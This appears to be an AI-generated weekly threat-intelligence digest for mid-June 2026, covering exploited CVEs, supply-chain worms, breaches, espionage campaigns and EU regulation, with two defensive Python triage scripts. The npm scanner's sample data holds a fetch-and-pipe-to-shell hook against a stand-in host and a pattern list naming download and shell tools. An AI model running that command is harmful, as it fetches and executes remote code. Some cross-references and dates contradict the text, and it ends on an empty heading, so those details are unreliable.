ctipilot.ch

CTI Weekly Summary — 2026-W24 (Jun 08 – Jun 14, 2026)

Type: weekly
Date: 2026-W24
Generator: Claude Opus 4.8 (`claude-opus-4-8`)
Classification: TLP:CLEAR
Language: English
Prompt: v2.60
Items: 27
CVEs: 32

0. Week at a glance

  • Ivanti Sentry pre-auth RCE went from PoC to backdoored gateways in four days. CVE-2026-10520 (CVSS 10.0) was an advisory-plus-public-PoC story on Tuesday; by week-end the unauthenticated MICS command injection was confirmed exploited in the wild with attacker implants on internet-facing Sentry gateways. (daily 06-10, daily 06-14, watchTowr Labs)
  • Windows Netlogon CVE-2026-41089 is now confirmed exploited inside the EU. CERT-EU advisory 2026-007 confirmed in-the-wild abuse of a pre-auth SYSTEM RCE on unpatched domain controllers — patch every DC in the forest if you have not. (daily 06-11, CERT-EU 2026-007)
  • ShinyHunters' Oracle PeopleSoft campaign was vendor-confirmed as a zero-day and attributed to UNC6240, with education hit hardest. Oracle shipped an out-of-band fix for CVE-2026-35273; the University of Nottingham quantified 455,000 records; Mandiant/GTIG put 100+ organisations in scope. (daily 06-12, daily 06-13, Google GTIG)
  • France's sovereign Tchap government messenger was breached — account-takeover scraped metadata on 73,467 civil servants, ANSSI detected it and DINUM disclosed; the largest public-sector incident of the week. (daily 06-10, DINUM)
  • June Patch Tuesday was the largest ever (198 CVEs) and finally closed the long-tracked Chaotic Eclipse zero-days (YellowKey, GreenPlasma, MiniPlasma) — but a fourth, GreatXML, remains unpatched, and an HTTP.sys pre-auth RCE (CVE-2026-47291, CVSS 9.8) headlines the release. (daily 06-10, daily 06-12, BleepingComputer)
  • NCSC-CH is warning of hacktivist DDoS against Swiss organisations during the G7 Évian summit (15–17 June). Pre-position scrubbing and CDN failover this weekend — the summit window opens Monday. (NCSC-CH)
  • The European Commission referred France and Spain to the CJEU over NIS2 non-transposition, 19+ months past the deadline — financial penalties now in play and a signal to the five remaining non-transposers. (Brussels Signal)

1. Highest-impact events — what's on fire if no one acted

CVE-2026-10520 / CVE-2026-10523 — Ivanti Sentry: pre-auth command injection to root, now confirmed exploited and gateways backdoored

If you did nothing this week: any internet-facing Ivanti Sentry gateway you run is likely already compromised. The flaw moved from "advisory plus public PoC" on 10 June to confirmed in-the-wild exploitation with persistent implants by 14 June.

CVE-2026-10520 (CVSS 10.0) is an unauthenticated OS command injection in the MICS (Mobile Iron Configuration Service) administrative interface of Ivanti Sentry — the EMM/MDM enforcement gateway that proxies email and applications to managed mobile devices and is frequently exposed to the internet. watchTowr Labs published the technical analysis and a working proof-of-concept on 10 June (watchTowr Labs; daily 06-10), and a paired path (CVE-2026-10523) compounds the exposure. By 14 June SecurityAffairs and others reported that gateways were being compromised shortly after patch release, with attacker-established footholds on exposed systems (daily 06-14, SecurityAffairs).

Because the injection is pre-auth and on the management interface, the only safe assumption for an exposed, unpatched Sentry is that it has been touched. Patch to the fixed Sentry release immediately, then treat the appliance as suspect: review for unexpected child processes spawned by the Sentry service account, unexplained outbound connections, and modified web-tier files. Restrict the MICS interface to management networks — it should never have been internet-reachable.

Changes since first coverage (3 prior appearances)
  1. 2026-06-14 (daily 06-14): Immediate Action callout + § 4 UPDATE. Material delta: Shadowserver confirms >=2 of 19 internet-exposed Sentry gateways backdoored within ~40h of watchTowr PoC; CISA KEV addition 11 Jun; CERT-EU 2026-008. Framed on exploitation, not KEV deadline (PD-13).
  2. 2026-06-13 (daily 06-13)
  3. 2026-06-10 (daily 06-10)

CVE-2026-41089 — Windows Netlogon: pre-auth SYSTEM RCE on domain controllers, confirmed exploited in the EU

If you did nothing this week: every unpatched domain controller in your forest is a pre-auth remote-code-execution target as SYSTEM, and the exploitation is no longer hypothetical — CERT-EU confirmed in-the-wild abuse in its jurisdiction this week.

CVE-2026-41089 is a CVSS 9.8 stack-based buffer overflow (CWE-121) in the Windows Netlogon RPC service. It was disclosed and patched in the May/June cycle and tracked in the W23 weekly as a disclosure-and-patch story. This week CERT-EU published advisory 2026-007 (10 June) confirming active exploitation against unpatched DCs in the EU (CERT-EU 2026-007; daily 06-11). A domain controller compromise is full-domain compromise: the entire identity plane is in scope.

Patch every domain controller now — DCs are the one asset class where "patch window" is not a negotiation. Where patching lags, restrict Netlogon RPC exposure at the network layer and hunt for anomalous pre-authentication RPC traffic to DCs and for new SYSTEM-context processes on those hosts.

Changes since first coverage (4 prior appearances)
  1. 2026-06-11 (daily 06-11): CERT-EU advisory 2026-007 (10 Jun) + CCB Belgium confirm ITW exploitation; per-version patched-build table.
  2. 2026-06-08 (weekly W23): Weekly recap: pre-auth SYSTEM RCE on DCs; Belgium CCB confirmed active exploitation; patch since 13 May.
  3. 2026-06-02 (daily 06-02): UPDATE: active ITW exploitation confirmed by CCB Belgium 2026-06-01 on the May Patch Tuesday Netlogon RCE; promoted to Immediate Action. Microsoft advisory not yet updated to mark exploited.
  4. 2026-05-13 (daily 05-13): May 2026 Patch Tuesday; ZDI flags wormable-candidate; MDASH-discovered.

CVE-2026-35273 — Oracle PeopleSoft: confirmed zero-day exploited by ShinyHunters (UNC6240), education sector hit hardest

If you did nothing this week: if you run internet-reachable Oracle PeopleSoft, assume data-theft exposure — the initial-access vector that was merely attacker-asserted last week is now vendor-confirmed as a zero-day, with 100+ organisations already breached.

What was a claim-only story on 11 June became vendor-confirmed within 48 hours. Oracle assigned CVE-2026-35273 (CVSS 9.8), an unauthenticated flaw in the PeopleSoft Environment Management Hub, and shipped an out-of-band patch (Oracle security alert; daily 06-12). Mandiant and Google GTIG then formally attributed the campaign to UNC6240 (ShinyHunters) and confirmed active exploitation against 100+ organisations, with the education sector disproportionately represented; the University of Nottingham quantified roughly 455,000 affected records (Google GTIG; daily 06-13).

This is a direct hit on a sector dense with European public-sector entities — universities and research institutions running PeopleSoft for HR and campus systems. Apply Oracle's out-of-band fix, then assume data exfiltration on any instance that was internet-reachable before patching: review Environment Management Hub access logs, rotate exposed credentials, and prepare for extortion contact, which is ShinyHunters' standard follow-through.

Changes since first coverage (3 prior appearances)
  1. 2026-06-14 (daily 06-14)
  2. 2026-06-13 (daily 06-13)
  3. 2026-06-12 (daily 06-12)

CVE-2026-50751 — Check Point Security Gateway: IKEv1 VPN authentication bypass exploited by a Qilin affiliate `[SINGLE-SOURCE]`

If you did nothing this week: a Remote Access VPN gateway running the deprecated IKEv1 path is an active ransomware entry point — a Qilin affiliate is using this bypass for initial access.

Check Point disclosed and patched CVE-2026-50751 (CVSS 9.3) on 8 June — a certificate-validation logic flaw in the deprecated IKEv1 key exchange affecting Remote Access VPN and Mobile Access on Security Gateway (Check Point; daily 06-09). The disclosure noted exploitation by a Qilin ransomware affiliate, which puts this firmly in the inaction-equals-incident column: VPN gateways are the front door, and a ransomware crew is already through it on unpatched IKEv1 deployments.

Apply the hotfix and, where operationally possible, disable IKEv1 entirely in favour of IKEv2 — the flaw lives in a protocol path most estates no longer need. Hunt for anomalous VPN session establishment without corresponding successful certificate validation and for new Remote Access sessions from unexpected geographies.

Changes since first coverage (1 prior appearance)
  1. 2026-06-09 (daily 06-09): First coverage + Immediate Action callout + deep dive. Pre-auth IKEv1 cert-validation bypass, CVSS 9.3, actively exploited by Qilin affiliate since 2026-05-07, CISA KEV, NCSC-CH Action-Required advisory.

2. Multi-day campaigns and chains

Chaotic Eclipse / Nightmare Eclipse Windows zero-day wave — three long-tracked bugs patched, a fourth still open

This researcher's serialised zero-day disclosures have run across four weekly cycles, and this week brought both resolution and a fresh open wound. June Patch Tuesday (9 June) finally closed the three bugs the W20–W22 weeklies tracked as "expected fix in June": YellowKey (CVE-2026-45585, BitLocker bypass via the Windows Recovery Environment, physical access required), GreenPlasma (CVE-2026-45586, CTFMON elevation to SYSTEM), and MiniPlasma (a re-opened regression of CVE-2020-17103 in the Cloud Filter driver cldflt.sys), per the patch-day round-ups (BleepingComputer; Tenable).

But the cadence continued the same day. On 9 June the researcher published RoguePlanet, a TOCTOU race in the Microsoft Defender scan engine yielding a SYSTEM shell — hours after the patches landed, with no CVE and no fix (BleepingComputer; daily 06-11). Two days later came GreatXML, a BitLocker bypass via crafted XML on the recovery partition — PoC public, practical severity contested, still unpatched (SecurityWeek; daily 06-12). The trajectory: deploy the June cumulative update to close the three patched bugs, retain BitLocker PIN/TPM policy regardless, and keep monitoring MSRC — the fourth disclosure is the pattern, not the exception.

Changes since first coverage (9 prior appearances)
  1. 2026-06-11 (daily 06-11)
  2. 2026-06-10 (daily 06-10)
  3. 2026-06-08 (weekly W23)
  4. 2026-05-30 (daily 05-30): Unpatched; physical access required; no patch as of 2026-05-30
  5. 2026-05-25 (weekly W22)
  6. 2026-05-24 (weekly W21): Consolidated in weekly summary for week 2026-W21
  7. 2026-05-20 (daily 05-20): UPDATE: CVE formally assigned (prior coverage 2026-05-15 had no CVE); MSRC published interim WinRE registry mitigation; remains exploit-code-maturity E:P / RL:W
  8. 2026-05-19 (daily 05-19)
  9. 2026-05-18 (weekly W21)

Shai-Hulud / Miasma supply-chain worm lineage — open-sourced, ported to PyPI, and a 1,500-package AUR wave

The supply-chain-worm family the W23 weekly consolidated under the Miasma/IronWorm banner spent this week proliferating across ecosystems and operators. On 9 June a SANS ISC handler tracked TeamPCP open-sourcing its Mini Shai-Hulud framework, immediately spawning a "Phantom Gyp" derivative (SANS ISC; daily 06-09). On 10 June the lineage opened a PyPI front dubbed "Hades" — 37 malicious wheels across 19 packages (The Hacker News; daily 06-10).

The week's largest wave hit the Arch User Repository. "Atomic Arch" began with roughly 400 orphaned AUR packages adopted and re-pointed to a Rust credential-stealer plus eBPF rootkit (The Hacker News; Sonatype; daily 06-13); a second wave around 12 June expanded the count further (tracker estimates range from the 400+ in primary reporting to ~1,500) and swapped some PKGBUILD delivery from npm dependency injection to bun install js-digest — active operator iteration against detection. The npm delivery mechanism has been linked by SANS ISC and subsequent reporting to the broader Shai-Hulud supply-chain family. Official Arch core/extra repositories were not affected; only adopted AUR packages. For defenders the through-line is constant: install-time script execution is the kill chain, and npm/bun/AUR build steps need to be treated as untrusted code execution in CI/CD.
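The install-time kill chain above (and the npm v12 change in § 9 that turns lifecycle scripts off by default) comes down to which dependencies declare `preinstall`/`install`/`postinstall` hooks. The inventory script below is an added example, not code from the Shai-Hulud reporting or from npm: it walks a `node_modules` tree, lists every package with such a hook, and flags commands that fetch a second stage or invoke a shell, using a constructed sample tree and assumed heuristics (the `SUSPICIOUS` pattern is a review aid, not a malware signature).

```python
"""Inventory of install-time lifecycle scripts in an npm dependency tree.

Added example (not the Shai-Hulud researchers' or npm's code). It lists every
package under node_modules that declares an install-time hook and puts the
ones that look like stage-two fetches first, producing the review list a CI
owner needs before turning install scripts off and approving the remainder
package by package.
"""
import json
import os
import re
import tempfile
from dataclasses import dataclass

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed heuristics for "deserves a human look"; not a malware signature.
SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|https?://|base64|eval\(|bash\s+-c|sh\s+-c|bun\s+install)",
    re.IGNORECASE,
)

@dataclass
class HookFinding:
    package: str
    hook: str
    command: str
    suspicious: bool

def scan_node_modules(root: str) -> list:
    """One HookFinding per declared lifecycle hook under root/node_modules.
    Follows nested node_modules and @scope directories; skips package.json
    files that are not package roots (e.g. fixtures inside a package)."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(os.path.join(root, "node_modules")):
        if "package.json" not in filenames:
            continue
        parent = os.path.basename(os.path.dirname(dirpath))
        if parent != "node_modules" and not parent.startswith("@"):
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                meta = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: not a package root we can assess
        scripts = meta.get("scripts") or {}
        name = meta.get("name") or os.path.basename(dirpath)
        for hook in LIFECYCLE_HOOKS:
            cmd = scripts.get(hook)
            if cmd:
                findings.append(HookFinding(name, hook, cmd, bool(SUSPICIOUS.search(cmd))))
    # Suspicious hooks first, then by package and hook name.
    return sorted(findings, key=lambda f: (not f.suspicious, f.package, f.hook))

def review_report(findings: list) -> list:
    """Plain-text lines for the approve-builds review; '!!' marks suspicious hooks."""
    return [f"{'!!' if f.suspicious else '  '} {f.package:<20} {f.hook:<11} {f.command}"
            for f in findings]

def build_sample_tree() -> str:
    """Constructed node_modules (not from any real project) with a benign native
    build hook, a scoped package fetching a second stage, and a nested package
    using the 'bun install' delivery variant mentioned in the Atomic Arch reporting."""
    root = tempfile.mkdtemp(prefix="lifecycle-demo-")
    packages = {
        "node_modules/left-pad": {"name": "left-pad", "version": "1.0.0"},
        "node_modules/native-thing": {
            "name": "native-thing", "version": "2.1.0",
            "scripts": {"install": "node-gyp rebuild"},
        },
        "node_modules/@acme/helper": {
            "name": "@acme/helper", "version": "0.3.1",
            "scripts": {"postinstall": "curl -fsSL https://example.invalid/stage2 | sh"},
        },
        "node_modules/native-thing/node_modules/nested": {
            "name": "nested", "version": "0.0.1",
            "scripts": {"preinstall": "bun install js-digest"},
        },
    }
    for rel, meta in packages.items():
        d = os.path.join(root, rel)
        os.makedirs(d, exist_ok=True)
        with open(os.path.join(d, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(meta, fh)
    return root

if __name__ == "__main__":
    for line in review_report(scan_node_modules(build_sample_tree())):
        print(line)
```

Run it against a real checkout by replacing `build_sample_tree()` with the project directory; packages that never appear in the report can be left with scripts disabled.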

Maine breach-notification portal hoax — fraudulent filings against VRChat and Discord, then the portal goes dark

A two-day arc that doubles as a fake-news cautionary tale. On 12 June, Maine's Attorney-General breach-notification portal published two fraudulent filings — one claiming a 2.4-million-user VRChat compromise, another a 10-million-user Discord breach — because the portal accepted submissions without verifying the submitter; both companies denied any breach (BleepingComputer; daily 06-12). On 12 June the Maine AG issued a formal statement confirming the filings were a hoax and took the portal offline (Maine AG; daily 06-13). The defender lesson is sourcing discipline: a government breach-notification portal is normally a high-reliability primary, but an unauthenticated submission path turned it into a vector for fabricated breach claims. Treat single-portal breach assertions as claim-only until the named victim confirms.

3. Vulnerability roll-up

CVE-2026-20253 — Splunk Enterprise: unauthenticated arbitrary file creation/truncation via the PostgreSQL sidecar proxy `[SINGLE-SOURCE]`

Disclosed this week and not yet seen exploited, but it belongs in the operationally-critical tier because Splunk is the SIEM/log-analytics backbone in many SOCs — including public-sector ones — and an unauthenticated flaw on your detection platform is a defender's worst-case blind spot. Per Splunk's advisory, CVE-2026-20253 (CVSS 9.8, CWE-306 Missing Authentication for Critical Function) lets an unauthenticated actor create or truncate arbitrary files via the bundled PostgreSQL sidecar proxy in Splunk Enterprise 10.0.0–10.0.6 and 10.2.0–10.2.3 — a primitive that can be chained toward code execution but which the advisory itself scopes as file creation/truncation rather than direct RCE (Splunk SVD-2026-0603; daily 06-14). Patch to the fixed maintenance releases; where the Splunk web/API tier is internet-reachable, restrict it now — a compromised SIEM lets an attacker both pivot and rewrite the evidence.

Changes since first coverage (2 prior appearances)
  1. 2026-06-15 (daily 06-15)
  2. 2026-06-14 (daily 06-14)

CVE-2026-49261 — MariaDB Galera cluster: pre-auth lateral RCE via `wsrep_notify_cmd`

NCSC-CH's Security Hub flagged a CVSS 10.0 OS command injection (post 12627, 11 June) that did not surface in the daily briefs. When MariaDB Community or Enterprise Server runs in a Galera cluster with wsrep_notify_cmd configured, the notification command is built by interpolating peer-supplied wsrep_node_name and wsrep_node_incoming_address fields directly into a string passed to sh -c — without escaping (NCSC-CH Security Hub; MariaDB CVE list). A malicious or compromised cluster peer that announces a node name containing shell metacharacters achieves arbitrary command execution on every cluster member with a notify command configured, at the privilege of the database process — lateral RCE across the whole cluster, DB authentication bypassed. Fixed in Community 10.6.27 / 10.11.18 / 11.4.12 / 11.8.8 / 12.3.2 and the corresponding Enterprise builds. This matters for European public-sector estates because MariaDB underpins a great deal of self-hosted open-source tooling (Nextcloud, Moodle, GLPI). Patch immediately; if Galera notifications are required, restrict cluster-join initiation to trusted internal nodes at the network layer (Galera ports 4567/4568) and disable wsrep_notify_cmd where it is not strictly needed.
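A triage helper for this item, added here as an example and not MariaDB's or NCSC-CH's code: given a server version string and a my.cnf fragment, it decides whether the build predates the fixed release for its branch (the fixed versions listed above) and whether `wsrep_notify_cmd` is actually configured, i.e. whether the injectable path is reachable at all. The configuration fragment is constructed; branch handling for versions outside the listed branches is left as a manual lookup.

```python
"""Triage for CVE-2026-49261 (MariaDB Galera wsrep_notify_cmd command injection).

Added example, not MariaDB's or NCSC-CH's code. Combines build state (is the
server older than the fixed release on its branch?) with configuration state
(is Galera on and is a notify command set?) into an action verdict.
"""
import re
from typing import Optional

# Fixed Community Server releases per branch, as listed in the advisory text.
FIXED_BY_BRANCH = {
    (10, 6): (10, 6, 27),
    (10, 11): (10, 11, 18),
    (11, 4): (11, 4, 12),
    (11, 8): (11, 8, 8),
    (12, 3): (12, 3, 2),
}

def parse_version(text: str) -> tuple:
    """'10.6.25-MariaDB-log' -> (10, 6, 25); build suffixes are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised MariaDB version: {text!r}")
    return tuple(int(x) for x in m.groups())

def is_vulnerable_build(version_text: str) -> Optional[bool]:
    """True if older than the fixed release on its branch, False if at or after it,
    None if the branch is not in the table (check release notes manually)."""
    v = parse_version(version_text)
    fixed = FIXED_BY_BRANCH.get(v[:2])
    if fixed is None:
        return None
    return v < fixed

def galera_notify_settings(config_text: str) -> dict:
    """Extract the Galera settings that decide exposure from a my.cnf fragment.
    Only [mysqld]/[mariadb]/[server]/[galera] sections count; '#' comments are dropped."""
    settings = {"wsrep_on": None, "wsrep_notify_cmd": None, "wsrep_provider": None}
    section = None
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("["):
            section = line.strip("[]").lower()
            continue
        if section not in ("mysqld", "mariadb", "server", "galera") or "=" not in line:
            continue
        key, value = (s.strip() for s in line.split("=", 1))
        key = key.lower().replace("-", "_")
        if key in settings:
            settings[key] = value.strip("'\"")
    return settings

def triage(version_text: str, config_text: str) -> dict:
    """Verdict for one server: patched / exposed / vulnerable-but-unreachable / unknown."""
    s = galera_notify_settings(config_text)
    build_vuln = is_vulnerable_build(version_text)
    clustered = s["wsrep_provider"] is not None and (s["wsrep_on"] or "").upper() in ("ON", "1", "TRUE")
    notify_configured = bool(s["wsrep_notify_cmd"])
    if build_vuln is None:
        verdict = "unknown branch: check MariaDB release notes manually"
    elif not build_vuln:
        verdict = "patched"
    elif clustered and notify_configured:
        verdict = "EXPOSED: patch now; restrict ports 4567/4568 to trusted nodes meanwhile"
    elif clustered:
        verdict = "vulnerable build, wsrep_notify_cmd unset: patch in normal cycle, keep it unset"
    else:
        verdict = "vulnerable build, Galera not enabled: patch in normal cycle"
    return {"build_vulnerable": build_vuln, "clustered": clustered,
            "notify_cmd": s["wsrep_notify_cmd"], "verdict": verdict}

# Constructed configuration fragment (not from any real deployment).
SAMPLE_CNF = """
[mysqld]
bind-address = 0.0.0.0
[galera]
wsrep_on = ON
wsrep_provider = /usr/lib/galera/libgalera_smm.so   # Galera plugin
wsrep_cluster_address = gcomm://10.0.0.11,10.0.0.12
wsrep_notify_cmd = /usr/local/bin/galera-notify.sh
"""

if __name__ == "__main__":
    for v in ("10.6.25-MariaDB-log", "11.4.12-MariaDB", "10.5.30-MariaDB"):
        print(v, "->", triage(v, SAMPLE_CNF)["verdict"])
```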

Changes since first coverage (1 prior appearance)
  1. 2026-06-12 (daily 06-12): Deep dive. Galera wsrep_notify_cmd shell injection; cluster-internal RCE to mariadbd privileges; companion CVE-2026-48165/48163.

CVE-2026-44748 — SAP NetWeaver AS ABAP: SAML XML Signature Wrapping (CVSS 9.9) `[SINGLE-SOURCE]`

SAP's June Patch Day (9 June) shipped multiple HotNews notes; the most severe affect NetWeaver AS ABAP and the ABAP Platform — the ERP backbone across Swiss federal/cantonal administration and EU public-sector finance. CVE-2026-44748 (CVSS 9.9) is a SAML XML Signature Wrapping flaw, paired with an unauthenticated RFC kernel memory-corruption bug (CVSS 9.8) (Onapsis; daily 06-10). Signature-wrapping bugs let an attacker forge an assertion that passes signature validation while carrying attacker-chosen identity content — an authentication bypass against SAML-federated logins. Apply the June HotNews notes; for SAML federation, verify the patched NetWeaver enforces strict assertion-to-signature binding, and hunt for logons with valid-but-anomalous assertion structure.

Changes since first coverage (1 prior appearance)
  1. 2026-06-10 (daily 06-10)

CVE-2025-8088 — WinRAR path traversal: still fuelling Ukraine intrusions a year after the fix `[SINGLE-SOURCE]`

A reminder that "patched" is not "remediated" where users don't update. Trend Micro documented two Russia-aligned campaigns still exploiting CVE-2025-8088 — a path traversal via NTFS Alternate Data Streams in WinRAR patched in July 2025 — nearly a year on: GIFTEDCROOK delivery via UAC-0226 and an Earth Dahu chain (Trend Micro; daily 06-10). The operational takeaway for any estate with desktop WinRAR: inventory and force-update, because the archived-fix assumption is exactly what these operators rely on.

Changes since first coverage (4 prior appearances)
  1. 2026-06-10 (daily 06-10)
  2. 2026-06-08 (weekly W23)
  3. 2026-06-03 (daily 06-03)
  4. 2026-06-02 (daily 06-02)

4. Sector & victim patterns

Public administration — the week's centre of gravity

The public sector again carried the highest concentration of operationally severe items. France's sovereign Tchap messenger breach (§ 5) struck the French civil service directly; NCSC-CH's Week 23 report documented a coordinated surge in job-seeker targeting against Swiss residents — fake interviews, reshipping identity theft, and LinkedIn-to-GitHub infostealer delivery (NCSC-CH; daily 06-10); and ENISA ran its biennial Cyber Europe 2026 exercise (10–11 June), testing the revised EU Cyber Blueprint and triggering the first live activation of the EU Cybersecurity Reserve (ENISA; daily 06-14). The pattern for a Swiss/EU public-sector SOC: the threats are arriving through identity and through suppliers, and the EU's collective-response machinery is being stress-tested precisely because that is where the pressure is.

Education — ShinyHunters' PeopleSoft campaign lands disproportionately on universities

The week's clearest sectoral concentration. Mandiant/GTIG's attribution of the Oracle PeopleSoft zero-day campaign (§ 1) explicitly noted that the education sector was hit hardest, with the University of Nottingham confirming ~455,000 affected records (Google GTIG; daily 06-13). It rhymes with the earlier Oxford University CareerConnect breach, where third-party provider Group GTI's compromise exposed students across multiple UK universities (Oxford; daily 06-09). European higher-education ICT teams running PeopleSoft or relying on shared careers/HR SaaS should treat both as direct warnings.

Healthcare & energy — large-scale personal-data exposure from theft and from mishandling

Two contrasting root causes in one week. Novo Nordisk disclosed the theft of non-public data including personal data after an external party accessed internal systems (§ 5) — a deliberate intrusion against pharma. At the other end, Kyushu Electric's transmission/distribution subsidiary lost an unencrypted portable SSD holding personal records for roughly 10.9 million customers — reportedly Japan's largest personal-data breach, and an entirely preventable one (BleepingComputer; daily 06-14). For utilities and healthcare data custodians the joint lesson is unglamorous: full-disk encryption on removable media is still the control that turns a lost-device headline into a non-event.

5. Incidents & disclosures recap

France's Tchap government messenger — account-takeover scrapes 73,467 civil servants' metadata

The most consequential public-sector incident of the week. On 7 June ANSSI detected a compromise of Tchap, the French state's sovereign Matrix-based encrypted messenger used by ~825,000 civil servants across all ministries; DINUM published the disclosure (DINUM; daily 06-10). The attacker used account takeover to scrape directory metadata on 73,467 users; message content, protected by end-to-end encryption, was not exposed, and CNIL was notified. The defender takeaway is that "sovereign and E2E-encrypted" still leaves a metadata-harvesting surface at the account/identity layer — the directory is a target even when the message body is not.

Novo Nordisk — theft of non-public data including personal data

Danish pharmaceutical maker Novo Nordisk disclosed on 11 June that an external party gained unauthorised access to a limited number of internal IT systems and copied non-public data, including personal data (Novo Nordisk; daily 06-13). The company's statement does not itemise the data categories beyond "personal data"; pharma and life-sciences SOCs should nonetheless treat research-data and personal-data repositories as crown-jewel assets, given their value for both espionage and extortion.

Law-enforcement follow-through — Conti loader developer pleads guilty, AudiA6 laundering service dismantled

Two enforcement wins with a Swiss touchpoint. Ukrainian national Oleksii Lytvynenko pleaded guilty on 12 June in US federal court (Middle District of Tennessee) to conspiracy to commit wire fraud for his role developing loaders for the Conti ransomware operation, after extradition from Ireland (DOJ via GlobalSecurity; daily 06-14). Separately, a US-Secret-Service-led operation with Europol, Eurojust and ten countries — Switzerland among the participants — dismantled the AudiA6 cryptocurrency money-laundering service and charged two individuals (US Secret Service; daily 06-12). The cumulative signal: the affiliate-and-launderer layer of the ransomware economy continues to be peeled back through international cooperation, with Swiss authorities now routinely in the coalition.

South Korea fines Coupang a record ₩624.7 bn over an unrevoked signing key

A regulatory follow-up worth a defender's attention because the root cause is mundane and universal. South Korea's Personal Information Protection Commission issued its largest-ever penalty against e-commerce platform Coupang, attributing a breach of tens of millions of customer records to a signing key that a former employee had stolen before departing and then used to harvest customer data undetected for months (The Record; daily 06-13). Key custody and anomaly detection on signing-key use are the controls that failed — and the months of undetected access is the part that turned an insider theft into a record fine.

6. Annual / periodic threat reports

CrowdStrike 2026 Technology Threat Landscape Report — "technology = most-targeted" reads as prophecy against this week's incidents `[SINGLE-SOURCE]`

CrowdStrike's report (published 9 June, distilled in the 06-11 daily) found technology to be the most-targeted sector. Rather than re-recap it, the weekly's lens is corroboration: this very week supplied the evidence. The Shai-Hulud/Atomic Arch supply-chain wave (§ 2), the ShinyHunters PeopleSoft zero-day (§ 1), and the run of AI-developer-platform flaws (Langflow, LangGraph, LiteLLM in § 3) are all attacks on the technology supply chain and the developer toolchain rather than merely through it. For a public-sector SOC the implication is that the technology vendors and open-source components in your stack are themselves now the front line — SBOM-driven component inventory (see § 8) is the prerequisite for reasoning about it.

7. Long-running campaigns — status update

VerdantBamboo (UNC5221 / WARP PANDA) — BSD-compiled BRICKSTORM confirmed on pfSense, plus a new PLENET backdoor

key: actor:VerdantBamboo. The W23 weekly first carried Volexity's IR disclosure of this China-nexus operator; follow-up reporting this week fills in the technical chain. Volexity's case describes a BSD-compiled variant of the BRICKSTORM Golang backdoor on an MSP customer's pfSense firewall, reached after compromising an Egnyte Storage Sync appliance (local privilege escalation via default egnyteservice sudo permissions, fixed in Storage Sync v13.13), plus a previously-undocumented .NET Native AOT backdoor named PLENET on a Synology NAS and an AGENTPSD dropper (Volexity; The Hacker News). The BSD variant is the status-changing detail: it confirms VerdantBamboo can operate on FreeBSD-based appliances, beyond the Linux-only model where enterprise EDR is already blind. The intrusion ran ~18 months undetected and was used to proxy through the MSP into customer Microsoft 365 tenants via Conditional Access bypass. Outstanding question for defenders: edge appliances (firewalls, NAS, sync gateways) remain the EDR dead zone — the hunt has to move to network-flow anomalies and appliance-integrity baselining, not endpoint telemetry.

Velvet Ant "Operation Highland" — Sygnia documents decade-long Linux PAM/sshd subversion

key: campaign:velvet-ant-operation-highland-2026. Sygnia's "Operation Highland" report, relayed in detail by The Hacker News on 12 June and deep-dived in the 06-13 daily, documents a China-nexus intrusion set that held covert access to an air-gapped network for nearly a decade (earliest traces ~2016) by subverting the Linux authentication stack: nine distinct backdoored pam_unix.so variants and credential-logging sshd/ssh binaries that suppress their own logging during operator sessions (The Hacker News; Sygnia — Operation Highland). The horizon framing the dailies could not give: this is the same tradecraft class as VerdantBamboo's edge-appliance persistence — long-dwell, identity/auth-layer implants on systems outside EDR coverage. The two together describe a sustained China-nexus investment in living below the endpoint-detection line. Defender watch-item: integrity-monitor PAM modules and sshd/ssh binaries against package checksums (rpm -V / dpkg --verify, AIDE/Tripwire), and treat air-gap as a latency control, not an isolation guarantee.

APT28 (GRU Unit 26165) — Sekoia documents a shift to LLM-generated payloads and cloud-native C2 `[SINGLE-SOURCE]`

key: campaign:apt28-tradecraft-evolution-2026. Sekoia's tradecraft-evolution retrospective (covered in the 06-14 daily) is worth tracking as a forward indicator rather than a single incident: the 2025–2026 tooling shows LLM-generated payloads (the LameHug stealer), cloud-native command-and-control (BeardShell), and router DNS-hijack persistence (FrostArmada) (Sekoia). The status-update value is the direction of travel: a top-tier Russian state operator is now industrialising LLM-assisted payload generation, which raises the baseline volume and variability of what defenders will see. Single-source (Sekoia TDR) and reported as the actor's TTPs, not new incidents — track it as a capability trend, not an active breach.

8. Policy & regulatory horizon

European Commission refers France and Spain to the CJEU over NIS2 non-transposition `[SINGLE-SOURCE]`

The week's most consequential regulatory move. The Commission referred France and Spain to the Court of Justice of the EU on ~9 June — the third and final stage of the infringement procedure — for failing to transpose NIS2 (Directive 2022/2555) more than 19 months past the October 2024 deadline (Brussels Signal). The CJEU can impose lump-sum fines and daily penalties until transposition completes. What defenders need to do differently: entities in non-transposed states operate in a legal grey zone — NIS2's substantive Article 21 security measures and Article 23 reporting windows apply as the floor even where the national implementing law and its competent authority do not yet exist. Swiss federal agencies and cantonal governments with regulated counterparts or outsourced providers in France or Spain should treat NIS2 Article 21 as the baseline regardless of national enforcement status, and watch the remaining non-transposers for the same escalation.

Germany's Bundestag opens first reading of the CRA domestic-implementation bill

Drucksache 21/6134 — "zur Durchführung der Verordnung (EU) 2024/2847" — had its first reading on 11 June, designating Germany's national CRA authorities, notified bodies and enforcement routes, with BSI the anticipated primary market-surveillance authority (Deutscher Bundestag). This is distinct from the general CRA notifying-authority deadline the W23 weekly tracked: it is the German legislative step starting the parliamentary clock (committee stage next, second/third readings and Bundesrat consent expected Q4 2026). The CRA's Chapter IV (notified bodies) entered force EU-wide the same day. What to do differently: Swiss ICT vendors exporting digital products to the German public sector, and German public-sector procurers, should track committee amendments now — the national authority designation determines who you report to and who surveils your products under the CRA.

ENISA publishes the first EU-wide SBOM Adoption State of Play — consumption lags generation

